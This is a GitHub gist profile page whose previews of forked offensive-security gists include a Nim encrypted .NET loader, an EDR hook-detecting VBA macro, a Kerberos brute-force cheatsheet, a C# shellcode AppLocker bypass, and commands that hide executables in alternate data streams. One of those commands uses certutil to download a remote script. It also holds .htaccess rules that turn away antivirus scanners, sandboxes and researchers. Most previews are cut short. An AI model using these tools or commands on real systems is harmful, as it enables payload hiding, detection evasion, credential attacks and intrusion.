Ceramicskate0 ceramicskate0

:octocat:
Coding things ;)
View GitHub Profile
@ceramicskate0
ceramicskate0 / rsrcDecryptAssembly.nim
Created January 7, 2022 03:36 — forked from ChoiSG/rsrcDecryptAssembly.nim
embed .net, decrypt, load and execute in nim poc
import nimcrypto
import winim/clr except `[]` # https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/ <-- thank you so much, 2 hours googling I almost went crazy
#[
All credit goes to @byt3bl33d3r (OffensiveNim) and @s3cur3th1ssh1t
nimble install winim nimcrypto zippy
nim c -d:danger -d:strip --opt:size rsrcDecryptAssembly.nim
slurp = "staticRead" will read the file and store it in the variable (.rdata) on compile time.
ceramicskate0 / hookdetector.vba
Created December 8, 2020 02:36 — forked from X-C3LL/hookdetector.vba
VBA Macro to detect EDR Hooks (It's just a PoC)
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
Dim address As LongPtr
ceramicskate0 / kerberos_attacks_cheatsheet.md
Created July 18, 2020 15:09 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

ceramicskate0 / Shellcode.cs
Created March 23, 2020 01:32 — forked from netbiosX/Shellcode.cs
C# file that contains shellcode and bypasses AppLocker via Assembly Load
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
ceramicskate0 / bin2sc.py
Created March 23, 2020 01:14 — forked from superkojiman/bin2sc.py
Convert bin to shellcode.
#!/usr/bin/env python
import sys

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print "usage: %s file.bin\n" % (sys.argv[0],)
        sys.exit(0)

    shellcode = "\""
    ctr = 1
    maxlen = 15
ceramicskate0 / Exe_ADS_Methods.txt
Created March 17, 2020 00:41 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
###Add content to ADS###
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
ceramicskate0 / transformFile.py
Created February 23, 2020 15:45 — forked from Arno0x/transformFile.py
Performs multiple useful transformations on files
#!/usr/bin/python
# -*- coding: utf8 -*-
#
# Author: Arno0x0x, Twitter: @Arno0x0x
#
import argparse
from Crypto.Cipher import AES
import pyscrypt
from base64 import b64encode
#LogLevel alert rewrite:trace3
#Time based access
RewriteCond %{TIME_HOUR}%{TIME_MIN} <0600
RewriteCond %{TIME_HOUR}%{TIME_MIN} >1800
RewriteRule ^.*$ replaceme [L]
#Day of week based access
RewriteCond %{TIME_WDAY} =0
RewriteCond %{TIME_WDAY} =6
RewriteRule ^.*$ replaceme [L]
ceramicskate0 / htaccess_USEAGENTS
Last active July 23, 2019 17:09
.htaccess of non windows user generated user agents
RewriteCond %{HTTP_USER_AGENT} "bits|bitsadmin|WindowsPowerShell|certutil|adobe" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "zgrab|+|X11|OpenBSD|Googlebot|python|java|linux|wget|curl|.net|git|virustotalcloud|Gh0st" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "Firefox/3.6.8|Safari|OS x|-|HTTP Banner Detection|Lynx|Slackbot|nmap|burp|cloudfront|bingbot|clshttp|archiver|sparta|loader|email|nikto|nessus|rapid|Qualys|vas|miner|sparta|HTTrack|crawl|shell|yahoo|google|bot|b\-o\-t|spider|baidu" [NC]
RewriteCond %{HTTP_USER_AGENT} "android|blackberry|iPhone|googlebot-mobile|Kindle|Nintendo|PlayStation|Windows Phone|XBOX_ONE_ED|AppleTV|Roku|CrOS|iemobile|ipad|iphone|ipod|opera mobile|palmos|webos" [NC]
RewriteCond %{HTTP_USER_AGENT} =""
RewriteRule ^.*$ replaceme [L]
#User agent string for native compiled software Libs and Linux tools
RewriteCond %{HTTP_USER_AGENT} ^googlebot [OR]
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
ceramicskate0 / .htaccess
Created July 23, 2019 16:33 — forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
Define REDIR_TARGET |DESTINATIONURL|
RewriteEngine On
RewriteOptions Inherit